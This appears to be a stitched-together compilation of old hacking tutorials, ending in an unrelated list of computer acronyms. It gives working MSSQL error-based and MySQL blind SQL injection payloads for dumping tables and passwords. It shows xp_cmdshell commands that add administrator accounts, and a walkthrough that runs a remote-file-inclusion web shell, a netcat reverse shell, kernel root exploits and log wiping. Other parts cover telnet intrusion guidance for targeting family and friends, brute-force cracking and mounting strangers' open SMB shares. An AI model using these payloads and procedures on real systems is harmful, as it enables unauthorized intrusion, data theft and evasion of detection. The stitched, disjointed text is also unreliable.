Get first table:

select top 1 table_name from information_schema.tables order by table_name

Example:,(select%20top%201%20table_name%20from%20information_schema.tables %20order%20by%20table_name))--sp_password

Get second table:

select top 1 table_name from information_schema.tables where table_name not in (select top n table_name from information_schema.tables order by table_name) order by table_name

Table 2: and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in (select top 1 table_name from information_schema.tables order by table_name) order by table_name))--sp_password

Table3: and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in (select top 2 table_name from information_schema.tables order by table_name) order by table_name))--sp_password

Retrieved column in the table called ten_table:
(only what is need to transfer ASCII)

select top 1 column_name from information_schema.columns where table_name=ten_table order by column_name

Get 1 Column :

select top 1 column_name from information_schema.columns where table_name=ten_table and column_name not in(select top n column_name from information_schema.columns where table_name=ten_table order by column_name) order by column_name

Once you have stripped and table column in the table important, you get information as usual using the following:

Retrieved final order:

SELECT top 1 convert(varchar,convert(varchar,isnull(convert(var char,T[1].,C[1,1]),char(32))) char(32) char(124) char(32) convert(varchar,isnull(convert(varchar,T[1].,C[1,2]),char(32))) char(32) char(124) char(32) ... char(32) char(124) char(32) convert(varchar,isnull(convert(varchar,T[n].,C[n,m]),char(32))))
FROM T[1], T[2], ..., T[n]
WHERE T[1].orderId=T[2].orderId and T[2].orderId=T[3].orderId and ... and T[n-1].orderId=T[n].orderId
ORDER BY T[1].orderId desc

Get the first order:

SELECT top 1 convert(varchar,convert(varchar,isnull(convert(var char,T[1].,C[1,1]),char(32)))


char(32) char(124) char(32) convert(varchar,isnull(convert(varchar,T[1].,C[1,2]),char(32))) char(32) char(124) char(32) ... char(32) char(124) char(32) convert(varchar,isnull(convert(varchar,T[n].,C[n,m]),char(32))))
FROM T[1], T[2], ..., T[n]
WHERE T[1].orderId=T[2].orderId and T[2].orderId=T[3].orderId and ... and T[n-1].orderId=T[n].orderId and T[1].orderId=n

With the first table T i, C [i, j] is the j th column of the table first, orderId column is numbered order order of each table
First We need to install Bitvise Tunnelier software (required)
And and SSH host Account (or SSH File Save)
- You can download the Tunnelier for FREE at
- Then install it on your PC
Download Link:

- Here I show how to use SSH Sock with a SSH File Save
- That is SSH File Save, open it. With SSH File Save you no need to do anything than run it by click Login
- before using just check what port of the SSH File Save
Click Services and see what port ^^... here is 7210
- OK now run the SSH File Save by click Login
- OK and it said succeeded. (we successfully connected with SSH host account)

Now change your Browser Setting to use with SSH to fake your IP
(we can Minimize the SSH File Save).
- In browser, at SOCKS HOST (Sock IP) must always use:
- And the Port is the SSH Port. Sock type is SOCK5
- Then check our IP after faking at
- And we have done ^^

Remember keep the SSH File Save run and how to know the SSH run or NOT? It's very simple, just look the small icon of the SSH Sock at the Taskbar ...
When you need to remove faking SSH Sock, just simply do as me ... And we have done
This method of SQL injection in Microsoft SQL involves injecting a query that attempts converting an sql query to an interger value using convert() though fails, resulting in an error message including the result of the SQL query. This allows an attacker to execute SQL queries on a server.

To test whether a variable is vulnerable to this type of injection, insert a ' onto the end of the value of a variable that acts with the db server, for example: index.asp?id=100' if the site is vulnerable to to this type of attack the page should produce an error msg that looks similiar to this:

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string

This allows you to execute sql queries to do tasks such as map out the tables and collumns in the database allowing them to get their hands on all information inside the DB.

convert(int, (select top 1 name from sysobjects where xtype='U' and name>'tablename'))
replacing tablename each time with the table name you get. Say for example from running that query you got a result of the table 'news' you'd run convert(int, (select top 1 name from sysobjects where xtype='U' and name>'news')) this would give you the next table in the database, and so on.

Then it's possible to get the collumns inside a table by using:

convert(int, (select top 1 name from syscolumns where colid=1 and id=(select top 1 id from sysobjects where xtype='U' and name='TABLE')))

obviously replacing TABLE with the table of your choice and colid=1 then colid=2 etc. until all collumns have been found. Of course then with basic SQL knowlege you can extend on this alot.

If the user running the SQL server is 'dbo' (database owner) this opens up alot more possibilities including blind command exection using EXEC. To test whether a server is running under DBO you'd run:


while it's DBO you can use this privilege to execute commands on the server allowing you to do things such as start or stop services, add a user account to the system and even escalate privileges to administrator as the db server is running as sysadmin.

page.asp?vuln=1;exec master..xp_cmdshell 'net users username password /add';--
page.asp?vuln=1;exec master..xp_cmdshell 'net localgroup Administrators username /add';--

after this, it's pretty useful to check if remote desktop, telnet are running etc.

If not you could start it yourself

This shows how clearly stupid it would be to run your db under 'dbo'.

A few things you can do to prevent this type of SQL attack are filtering out characters such as quote marks - single and double, the semi colon and even slash and backslash and just generally tightening user input.
In the beginning there was dial-up, and it was slow; then came broadband in the form of cable, which redefined how we access the internet, share information, and communicate with each other online. Hacking the Cable Modem goes inside the device that makes Internet via cable possible and, along the way, reveals secrets of many popular cable modems, including products from Motorola, RCA, WebSTAR, D-Link and more.

Inside Hacking The Cable Modem, you'll learn:
# the history of cable modem hacking
# how a cable modem works
# the importance of firmware (including multiple ways to install new firmware)
# how to unblock network ports and unlock hidden features
# how to hack and modify your cable modem
# what uncapping is and how it makes cable modems upload and download faster

Written for people at all skill levels, the book features step-by-step tutorials with easy to follow diagrams, source code examples, hardware schematics, links to software (exclusive to this book!), and previously unreleased cable modem hacks.

Download now
1. Introduction
2. Warnings
3. Copyright Information
4. Disclaimer
5. Who Am I?
6. Shout Outs

Chapter Two: Before We Start

1. What The Hell Is Telnet?
2. What Was The Original Purpose?
3. What Can I Do With It?
4. Is It Illegal?
5. Will I Go To Jail?
6. Is It Fun?

Chapter Three: Getting Started

1. Possible Targets
2. Is The Target Alive?
3. Scanning For Ports
4. Getting An IP
4.A. Messenger
4.B. Social Engineering It
4.C. Your Firewall

Chapter Four: Connecting

1. Connecting To An IP

Chapter Five: What To Do After Your Connected

1. Doing Something!
2. FTP

Chapter Six: Cracking A Pass

1. Brutus
2. Password Lists
3. Default Passwords

Chapter Seven: FAQ's

1. 'I Get A Blank Screen After Connecting!'
2. 'It Says It Can't Connect! WTF!'
3. 'My Computer Flips Off After Connecting!'
4. 'Where Do I Type My Commands?'
5. 'I Got Arrested!!! Can I Sue You?'

Chapter Eight: Wrapping Up

1. Contact Me
2. TGS



Hey. I decided that my old telnet tutorial was not sufficient, so I
decided to redo it, among all the other work I have to do. This will
provide a step by step method to: Connect to an IP, Connect to a
certain port, Decide if the port is responsive, Find commands that you
can use on this 'Box', Use the commands, Crack a password using
'Brutus', Find Targets, and many other things. It will also include
many pictures that you can use as a reference. Remember, all command
prompts are different, don't be discouraged.


This is a form of hacking. Whether you do or do not damage a computer,
you are committing a felony. Connecting to a computer or something of
the kind without permission is punishable by law and will get you corn
holed in a state prison by a 365 pound, one eared black man by the
name of bubba. You can be held to Criminal, as well as Civil suites
for your actions.

Doing this is a good way to get enemies' also. Remember, there are
hundreds of hacking groups out there, and hundreds of hackers, there's
a chance that you can be fucking with a hacker of a group, and that is
not a fun thing to do.

~`Copyright Information`~

This or any portion of this paper is allowed to be duplicated. You may
host it on your site, as long as it stays intact. Failure to comply
with this will result in swift legal action.


I cannot be held responsible for your actions because of this. I will
not take responsibility. If you don't agree with this, DO NOT READ
FURTHER. I do not condone hacking, as well as any other form of
illegal behavior. Also, you will encounter a number of IP's in this
forum, DO NOT USE ANY OF THEM. The ones I used for demonstration I did
not hurt, and I take no responsibility if you do use them. You have
been warned.

NOTE: I used (the website of a fine military academy) in
some of my examples. I mean no harm to come to I did not
hack, and I don't recommend you doing it either. I take
no responsibility if you do though.

~`Who Am I?`~

I am Errorised of the forums. If you'd like to get a hold of me, do
so at

~`Shout Outs`~

Hey I'd like to say hello to my good buddies: Wau / Placi / Maki / Unstable /
Phantom / BOOSTER / Chaos Zero / T1M3 / M4K3 / RedFox / Mr.Wolves / h3r3t1c
and whoever else I forgot (due to the pot) These are all buddies, as
well as PSP-Hacks members.


~`What Was The Original Purpose Of Telnet?`~

Telnet was originally made for someone to do all sorts of things. From
checking your mail to connecting to your company's server while on a
business trip, telnet does it all. The makers of

it had a dream in mind that the average person could deal with
command/text based programs. But of course when the masses got into it
and every brother and sister bought a computer,

Windows was made, which totally destroyed most text based programs.
Now fucking idiots run computers and company's with computers, and
can't even deal with a damn telnet program!

~`What Can I Do With It?`~

Although Telnet has died for the business men, it is still growing
quickly with the not-so-trustful person. For the hacker, Telnet is the
hammer in the tool box. Telnet is one of the most

world wide programs among hackers, as well as other fun loving people.
When you finally hit that golden hack after your first long hours of
struggling with telnet (not!), you are god!

You can change other people's passwords, snoop on e-mails, forge dirty
e-mails to ones lover,

~`Is It Illegal?`~

Two words: HELL YES. Hacking is the most illegal thing one can do on
the internet. Do not be mistaken, it's quite illegal.

~`Will I Go To Jail?`~

Only if you're caught. This is why it's good to encrypt your entire
hard rive, if they can't get anywhere in your hard rive, how the hell
are they going to charge you with anything? It is very good to be
paranoid. My computer is a vault. The military runs 1800 bit
encryption tops. The average bit encryption for any given file in my
computer is around 7000, Triple Blowfish encrypted. There's also a
shredder that hides in the startup registry that I made in a batch
file, it hides there and if you don't turn it off within 15 seconds of
starting up, bye bye computer and bye bye evidence. It's always good
to be paranoid.

~`Is It Fun?`~

Despite my comments about jail, it is quite fun. Most hackers do what
they do for the simple thrill of knowing secrets that no ones supposed
to know. Having inside information on people

who they barely know or care about. Knowing top secret information
that only god and the president are supposed to know, now that's fun!


~`Possible Targets`~

A target is a person, place, or thing (kind of like a noun, eh?) in
which you are planning on attacking. A target can be anyone! Common
targets include: Family, Friends, Government, Phone

Company's, and Former Attackers. Normally the first target is a friend
or family member, someone who's not so smart and someone you know for
a fact has no security. Security just gets in the way. '7337' hackers
learn to deal with security, newbie's fall into the trap. So for now
stick with someone easy.

~`Is The Target Alive?`~

Go to command prompt (or Ms-DOS) and type ping (replacing the
zeros for the real IP). If it returns, then the computer is connected
to the internet. If it says that its lost, then the computer offline

~`Scanning For Ports`~

We will be using Blues Port Scanner to scan for ports. You can get
blues port scanner at or It is about
400 KB, not too big.
You scan an IP for ports by pasting (CTRL V) the IP in both boxes in
the top. This makes it scan only that ip. You then put the selected
range of ports in which you wish to scan.

The more you scan, the more of a chance they will notice your
movements, but do as you please.

~`Getting An IP`~

IP is short for Internet Protocol. Each computer has an IP. Getting
someones IP can be as easy as asking for it. Here's a few ways:


Ok, so you have MSN messenger. Your a 'bad mofo', a 'rough rider', now
its time to get what you need from your victim. The first thing to do
is build trust. It would be wise to do this on someone you know will
trust you enough to buy into your shit. Here's how you get their IP:

1. Send them a file through MSN (or whatever they have). It can be
anything, a game, a dead hamster, a naked picture of yourself,

2. Once they accept, go into Command Prompt and type "netstat".

3. With a bit of hunting and picking you should be able to find their
IP in the box.

Social Engineering:

Social Engineering is a fancy term that people use to discribe smooth
talkers. Social Engineerers are slick, smooth, smart, and know what
their talking about. They get into the part before

attacking, they have great social skills and are easy people to trust.
Social Engineerers build up a nice level of trust, the more the
better, until they get the information they want.
Once, on a SC 'field trip' with a friend of mine, we actually got
dressed up to walk to a payphone and make the attack that we've been
building trust for months. It was worth it.

But anyway, back to the subject.

Usually, all you need to do is ask the person. If they know better
then to give you the IP if you flat out ask them, then they will know
better then if you try to scare it out of them. Get em to go to and give you the numbers in the blue letters.

Your Firewall:

If you have a firewall, then chances are you've seen someone trying to
scan you for open ports. If you use Black ICE, all the better. I
suggest you download it at

What Black ICE does is gather up all the attempts to port probe you,
connect to your computer, or anything else, and stick it in a database
for further use. You can easily pick out targets from the list and use
them for your will.

Double click on the person you wish to get the ip with, and on the
right it gives you the IP AND the DNS! How nice eh?


~`Connecting To An IP`~

Ok, so you've got your list of open ports on the computer. For this
demonstration I'll be using someone who attempted to hack me a while
back. After scanning a few thousand ports, we come up with this list.
Now not all of these allow connections. The ones labeled with a red
box next to them are 'dead' ports for the telnet program. This is
usually because they only communicate using a certain 'language' that
Telnet doesn't support. When you try to connect to these you get a
blank screen with dashs where you try to type (see below). The
listings labeled with a green next to them allow connections and will
talk to you without having to give it a user or pass. The ones labeled
with a blue box next to them means that they are responsive, are not
dead, but they require authentication before your allowed to connect.
If you really need into this computer and they've got password
protected ports, there's a section later in the paper that tells you
how to get in. So anyway, lets focus on the responsive port. This is
unfortunately the SMTP port (Simple Mail Transfer Protocol). Although
it does not allow a significate amount of access to this persons
computer without knowing advanced things, it does give us a good basis
for a demonstration in Telneting. Below will show you step by step on
how to connect and other things with this port.

1. Connect to the computer by typing "Telnet 25" in Command
Prompt/Ms DOS. You should replace the "" for the IP address you
wish to connect to, and the 25 for the specific port you plan on
connecting to. For this demonstration, I will be using the IP and the port 25. So the command should read "telnet 25". There's no special place to type (as I've received
many e-mails questioning this), when you type, it should show up at
the bottom.

2. Press enter.

Congratulations! You just made your first connection! Although it's
not a quantum leap in the exploration of computer security, it's a

~`Doing Something After You Connect


~`Doing Something!`~

Alright, so you've got your open connection on an open port. It's best
to keep the connection time down to a minimum to reduce them knowing.
I'll now demonstrate on what to do after you're connected.

1. Generically speaking, typing help will give you a list of all the
commands supported for that Box. However, some require you to log on
before doing so, what a drag!
Alright, after typing help this is how it responded.

You see that there's a nice listing of commands you can use. Since
this port is not pass protected, you have no worries about
restrictions. Typing "help" and then the command in which you want
help on will make it elaborate, which is a great feature for a newbie!
This is a pic of me asking it to elaborate on a few things.

2. You can never forget to say "hello". It's quite rude to run through
someone's home (computer) without even introducing yourself. This
young lady was much nicer after I said "helo" to it.

[NOTE: I lost the pics and I'm too fucking lazy to make a helo pic…
I'm sure you're smart enough to figure it out]

3. Use the commands in the box to figure out what you want to do.
Since every computer and port is different, it is impossible for me to
show you every single thing you can do. Learn to get off your bum and
ask it what some of the commands mean, its a good learning tool.


You can also connect to port 21 (FTP, or File Transfer Protocol) using
telnet. Typing help will give you a listing that you nee



Brutus is a great Brute Force password cracker. It is easy to use for
the newbie, fast, and reliable. You can find it by doing a search at for "Brutus".

~`Password Lists`~

I'm proud to announce that two of our TGS members, The_IRS and
Computer Geek, have combined many lists and have came out with a
password list with a total of 2.1 passwords. You can download it here:

~`Default Passwords`~

You can find many lists of default passwords for any operating systems
on the web. Doing a search at for "Default Password Lists"
will come in handy. Here is a very good site with many default
passwords that you can access in the meantime:


1. "I Get A Blank Screen After Connecting!"

The port that your connecting to is 'dead', or unusable. This could be
due to a number of different things. For instance, lets say that your
trying to connect to someones computer through telnet, on the kazza
port (which I beleive is 1214). This port is not designed to take
packets (data) from the telnet program, and is specifically designed
to give and receive packets (data) from the kazza program. This could
be one of your problems. Trying to connect to a backdoor for a Sub7
program will also do the same.

2. "It Says I Can't Connect! WTF!"

This is because the port is either closed, or the computer is firewall
protected. As a newbie I wouldn't suggest messing with it.

3. "My Computer Flips Off After Connecting!"

I'll bet money your using Windows. You are aren't ya? I knew it! This
is a Windows Dump File. Either update Windows, get Linux, or forget

4. "Where Can I Type My Commands?"

Type a few letters to see where they commands will show up. Most
likely it will be at the bottom of the Command Prompt/MS DOS screen.

5. "I Got Arrested!!! Can I Sue You?"

NO! You read my disclaimer at the top. I don't care who you are, I'm
not taking responsibility.

Blind injection is a little more complicated the classic injection but it can be done :D

I must mention, there is very good blind sql injection tutorial by xprog, so it's not bad to read it :D

Let's start with advanced stuff.

I will be using our example

when we execute this, we see some page and articles on that page, pictures etc...

then when we want to test it for blind sql injection attack and 1=1 <--- this is always true

and the page loads normally, that's ok.

now the real test and 1=2 <--- this is false

so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.

1) Get the MySQL version

to get the version in blind attack we use substring

i.e and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e and substring(@@version,1,1)=5

2) Test if subselect works

when select don't work then we use subselect

i.e and (select 1)=1

if page loads normally then subselects work.

then we gonna see if we have access to mysql.user

i.e and (select 1 from mysql.user limit 0,1)=1

if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

3). Check table and column names

This is part when guessing is the best friend :)

i.e. and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)

then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one :)

let's say that we have found that table name is users, now what we need is column name.

the same as table name, we start guessing. Like i said before try the common names for columns.

i.e and (select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page loads normally we know that column name is password (if we get false then try common names or just guess)

here we merge 1 with the column password, then substring returns the first character (,1,1)

4). Pull data from database

we found table users i columns username password so we gonna pull characters from that. and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

ok this here pulls the first character from first user in table users.

substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value

and then compare it with simbol greater then > .

so if the ascii char greater then 80, the page loads normally. (TRUE)

we keep trying until we get false. and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99


so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.

then let's check the second character. and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght) and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, the page loads normally, higher. and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, lower number. and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher. and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105


we know that the second character is char(105) and that is 'i'. We have 'ci' so far

so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,

cause that makes you better SQL INJECTOR :D

Hope you learned something from this paper.

Have FUN! (:


You will need:

- Vulnerable Site in R.F.I.
- Shell for R.F.I. (e.g. c99, r57 or other)
- NetCat
- Local Root Exploit (depending on the kernel and the version)

This aim tutorial is to give a very general picture in process of Rooting
in Linux Server with Safe Mod: OFF.


Suppose that we have found a site with R.F.I. vulnerability:

e can run shell exploiting Remote File Inclusion, as follows:

where evilscript.txt is our web shell that we have already uploaded to
our site. ( in the folder: shells)

After we enter in shell, first of all we will see the version of the kernel
at the top of the page or by typing: uname - a in Command line.

To continue we must connect with backconnection to the box. This can done with
two ways if we have the suitable shell.

We can use the Back-Connect module of r57/c99 shell or to upload a backconnector
in a writable folder

In most of the shells there is a backconnection feature without to upload the
Connect Back Shell (or another one shell in perl/c). We will analyze the first
way which is inside the shell (in our example the shell is r57).

Initially we open NetCat and give to listen in a specific port (this port must
be correctly opened/forwarded in NAT/Firewall if we have a router) with the
following way:

We will type: 11457 in the port input (This is the default port for the last versions
of r57 shell). We can use and other port.

We press in Windows Start -> Run -> and we type: cmd
After we will go to the NetCat directory:


cd C:\Program Files\Netcat

And we type the following command:

nc -n -l -v -p 11457

NetCat respond: listening on [any] 11457 ...

In the central page of r57 shell we find under the following menu::: Net:: and
back-connect. In the IP Form we will type our IP ( to see our ip if
we have dynamic)

In the Port form we will put the port that we opened and NetCat listens.

If we press connect the shell will respond:

Now script try connect to port 11457 ...

If our settings are correct NetCat will give us a shell to the server

Now we wil continue to the Rooting proccess.

We must find a writable folder in order to download and compile the Local
Root Exploit that will give us root priviledges in the box. Depending on the version
of the Linux kernel there are different exploits. Some times the exploits fail to run
because some boxes are patched or we don't have the correct permissions.

List of the exploits/kernel:

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl

We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.

Some sites that we can find Local Root Exploits:

www.milw0rm (Try Search: "linux kernel")

Other sites: |
or try Googlin' you can find 'em all ;-)

We can find writable folders/files by typing:

find / -perm -2 -ls

We can use the /tmp folder which is a standard writable folder

We type: cd /tmp

To download the local root exploit we can use a download command for linux like

For example:


where is the url of h00lyshit.

After the download we must compile the exploit (Read the instruction of the exploit
before the compile)

For the h00lyshit we must type:

gcc h00lyshit.c -o h00lyshit

Now we have created the executable file: h00lyshit.

The command to run this exploit is:


We need a very big file on the disk in order to run successfully and to get root.

We must create a big file in /tmp or into another writable folder.

The command is:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename.

We must wait 2-3 minutes for the file creation

If this command fails we can try:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can procced to the last step. We can run the exploit by typing:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(If we are in a different writable folder and the largefile is created in /tmp)

If there are not running errors (maybe the kernel is patched or is something wrong with
exploit run or large file) we will get root

To check if we got root:

id or


If it says root we got root!

Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.
SSHDoor) and to take ssh/telnet shell access to the server.

We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner.


[- How to Find LFI Vulnerability -]

How to Find LFI Vulnerability, Well i use me of adding ..

Real World Examples:

Warning: main(...html): failed to open stream: No such file or directory in /home/groups/j/je/jedit/htdocs/index.php on line

Warning: main(): Failed opening '...html' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/j/je/jedit/htdocs/index.
php on line 63

This is not Vulnerable,
A Vulnerable should look like

Warning: include() [function.include]: Failed opening '...php' for inclusion (include_path='.:/usr/share/pear') in /
home/shiner/ on line 62

include is the code , the script is using for example

$page = $_GET[page];

Should be [function.include]

$page = $_GET[page];

should be [function.require_once] or [function.require]

[- Find Example (Real) -]

Gives us.

Fatal error: require_once() [function.require]: Failed opening required './..' (include_path='.:/:/usr/php/pear'
) in /indexm.php on line 164


So we know it Vulnerable

if Windows OS, you can just do

other try

until you get Something.
Angry IP Stripper...

I hate cut n pasting IP's from Angry IP to my command prompt or from my Export of scanned IP's from Angry to cmd.
I looked at ways to speed up the process of doing the following command "net view \\" without the need to go back and forth from one window to another 50 times to find a small list of IP's with open shares.

I ask around on a few different Forums and someone gave me the key to make one command to stripped Agry's export and out put the IP's into CMD with the command net view \\ and do the crap work for me.

So now I can type one command or cut n paste one command to do 50 or whatever search's for open share's.

Here it is...

for /F "eol=; tokens=1,2* delims=, " %i in (2.txt) do @echo net view \\%i>>1.bat

Ok let me explain a few things.

When Angry has finished scanning a range, I export the results to a .txt file, I might name it 1.txt or 2.txt.

Inside the txt file it looks like this
This file was generated by Angry IP Scanner
Visit for the latest version

Scanned - (Ports: 5110,139,12345,23,445)
24/03/2008 11:59:28 PM

IP Ping Hostname Comp. Name Group Name User Name MAC Address TTL Open Ports 92 ms pD9517A94.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23 994 ms pD9518001.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23 327 ms pD95188EC.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23 1806 ms pD9518F52.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 23 733 ms pD951BE22.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 445 651 ms N/A N/A N/A N/A N/A N/A 23 290 ms pD951E6FD.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 445 417 ms pD951EB7E.dip0.t-ipconnect.deN/A N/A N/A N/A N/A 445 198 ms N/A N/A N/A N/A N/A N/A 23 387 ms pD951F822.dip.t-dialin.netCONNIPET N/A CONNIPET N/A N/A 139 331 ms pD951FA25.dip.t-dialin.netN/A N/A N/A N/A N/A 23 101 ms pD951FBCA.dip.t-dialin.netHOME-PC ARBEITSGRUPPE N/A N/A 50 139 128 ms pD951FF3C.dip.t-dialin.netN/A N/A N/A N/A N/A 139,445

I dont have to get Angry to save all this info, I just like looking at the different names to get a feel of what a system might have on it.

That export is saved to c:\ for example, I run cmd.exe, goto c:\, type dir and there it is.

I paste in the for command, for /F "eol=; tokens=1,2* delims=, " %i in (2.txt) do @echo net view \\%i>>1.bat

I double check its going to look in the correct txt file and also pick a name for the bat file, (auto, 1, run) it doesnt matter what the .bat is called, once I check and see the info is correct I hit enter...

Then type the name of the .bat file and its running by itself..

Ctrl-Break, to stop the batch file running. Hit 3 or 4 times and wait 10 seconds..

So for me it looks like this
C:\>for /F "eol=; tokens=1,2* delims=, " %i in (2.txt) do @echo net view \\%i>>1

C:\>net view \\
System error 53 has occurred. <---(Most likely firewall)
The network path was not found.
C:\>net view \\


The other thing I do is increase the command prompt height buffer so that all the information scrolling a long doesnt get lost, right click command prompt, select properties, layout, increase screen buffer size Height to 1000 or more depending on how many IPS you need to check.

Sit back and wait for it to go through the list, 50's a good number. once its done, right click the screen, mark it all, right click it again and save it in note pad and check what you have to open up..
net view \\
Shared resources at \\
Share name Type Used as Comment
C Disk
Enviar Para o OneNote 2007 Print Enviar Para o OneNote 2007
Fact2007 Disk
HP Photosmart 7400 Series Print HP Photosmart 7400 Series
I Disk
Public Disk
Users Disk
The command completed successfully.

(One scan brought up this list of drives on a share.)

c:\net use k: \\\C
c:\The command completed successfully.
c:\net use L: \\\Fact2007
c:\The command completed successfully
c:\net use M: \\\I
c:\The command completed successfully

Now in my compuer under network drives, I have 3 new shares to look at.

c on ''
Fact2007 on ''
I on ''

Once your done browsing don't forget to right click on these and disconnect, otherwise your system will run real slow.

Also each time you run the for command and you dont change the name of your .bat file new infomation is added to it instead of it been over written.
Why this is, Im not sure, it just means the list will grow and it will take longer and longer to run a scan, so del *.bat before you run a new Stripper.

c:\edit *.bat, Select shift-Arrow Down to select a portion to delete is another option.
Edit also lets to look at what the bat looks like. The start of the bat has a little junk in it it while its running.

C:\>net view \\This
System error 53 has occurred.
The network path was not found.
C:\>net view \\Visit
System error 53 has occurred.
The network path was not found.
C:\>net view \\Scanned
System error 53 has occurred.
The network path was not found.
C:\>net view \\24/03/2008
System error 123 has occurred.
The filename, directory name, or volume label syntax is incorrect.
C:\>net view \\IP
System error 53 has occurred.
The network path was not found.
C:\>net view \\

Edit the bat file to remove the first couple of lines ot just ignore it and let it run.

c:\for /?

Brings up all the help info on the "for" command, I never knew about it until I started asking about how to do this, I was exspecting someone to write a perl script or something, but this just goes to show theres still a lot to learn inside windows and all the little files that are with in.

I hope you guys find this useful and a real time saver and look at new ways to use the for command.

Regards RoMeO...
Computer Acronyms ,The List

ADSL - Asymmetric Digital Subscriber Line
AGP - Accelerated Graphics Port
ALI - Acer Labs, Incorporated
ALU - Arithmetic Logic Unit
AMD - Advanced Micro Devices
APC - American Power Conversion
ASCII - American Standard Code for Information Interchange
ASIC - Application Specific Integrated Circuit
ASPI - Advanced SCSI Programming Interface
AT - Advanced Technology
ATI - ATI Technologies Inc.
ATX - Advanced Technology Extended

--- B ---
BFG - BFG Technologies
BIOS - Basic Input Output System
BNC - Barrel Nut Connector

--- C ---
CAS - Column Address Signal
CD - Compact Disk
CDR - Compact Disk Recorder
CDRW - Compact Disk Re-Writer
CD-ROM - Compact Disk - Read Only Memory
CFM - Cubic Feet per Minute (ft?/min)
CMOS - Complementary Metal Oxide Semiconductor
CPU - Central Processing Unit
CTX - CTX Technology Corporation (Commited to Excellence)

--- D ---

DDR - Double Data Rate
DDR-SDRAM - Double Data Rate - Synchronous Dynamic Random Access Memory
DFI - DFI Inc. (Design for Innovation)
DIMM - Dual Inline Memory Module
DRAM - Dynamic Random Access Memory
DPI - Dots Per Inch
DVD - Digital Versatile Disc
DVD-RAM - Digital Versatile Disk - Random Access Memory

--- E ---
ECC - Error Correction Code
ECS - Elitegroup Computer Systems
EDO - Extended Data Out
EEPROM - Electrically Erasable Programmable Read-Only Memory
EPROM - Erasable Programmable Read-Only Memory
EVGA - EVGA Corporation

--- F ---
FC-PGA - Flip Chip Pin Grid Array
FDC - Floppy Disk Controller
FDD - Floppy Disk Drive
FPS - Frame Per Second
FPU - Floating Point Unit
FSAA - Full Screen Anti-Aliasing
FS - For Sale
FSB - Front Side Bus

--- G ---
GB - Gigabytes
GBps - Gigabytes per second or Gigabits per second
GDI - Graphical Device Interface
GHz - GigaHertz

--- H ---
HDD - Hard Disk Drive
HIS - Hightech Information System Limited
HP - Hewlett-Packard Development Company
HSF - Heatsink-Fan

--- I ---
IBM - International Business Machines Corporation
IC - Integrated Circuit
IDE - Integrated Drive Electronics
IFS- Item for Sale
IRQ - Interrupt Request
ISA - Industry Standard Architecture
ISO - International Standards Organization

--- J ---
JBL - JBL (Jame B. Lansing) Speakers
JVC - JVC Company of America

- K ---
Kbps - Kilobits Per Second
KBps - KiloBytes per second

--- L ---
LG - LG Electronics
LAN - Local Are Network
LCD - Liquid Crystal Display
LDT - Lightning Data Transport
LED - Light Emitting Diode

--- M ---
MAC - Media Access Control
MB ? MotherBoard or Megabyte
MBps - Megabytes Per Second
Mbps - Megabits Per Second or Megabits Per Second
MHz - MegaHertz
MIPS - Million Instructions Per Second
MMX - Multi-Media Extensions
MSI - Micro Star International

--- N ---
